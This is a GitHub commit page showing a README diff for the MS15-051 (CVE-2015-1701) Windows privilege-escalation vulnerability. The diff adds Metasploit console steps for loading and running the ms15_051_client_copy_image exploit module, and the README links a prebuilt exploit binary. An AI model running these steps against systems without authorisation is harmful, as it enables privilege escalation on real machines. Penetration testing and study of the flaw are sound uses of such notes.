We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent ad971c6 commit 527a881Copy full SHA for 527a881
MS15-051/README.md
@@ -6,6 +6,16 @@ Vulnerability reference:
6
* [MS15-051](https://technet.microsoft.com/en-us/library/security/ms15-051.aspx)
7
* [CVE-2015-1701](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe)
8
9
+# load the module within the Metasploit console
10
+```
11
+ msf > use exploit/windows/local/ms15_051_client_copy_image
12
+ msf exploit(ms15_051_client_copy_image) > show targets
13
+ ...targets...
14
+ msf exploit(ms15_051_client_copy_image) > set TARGET <target-id>
15
+ msf exploit(ms15_051_client_copy_image) > show options
16
+ ...show and set options...
17
+ msf exploit(ms15_051_client_copy_image) > exploit
18
19
20
### Links
21
0 commit comments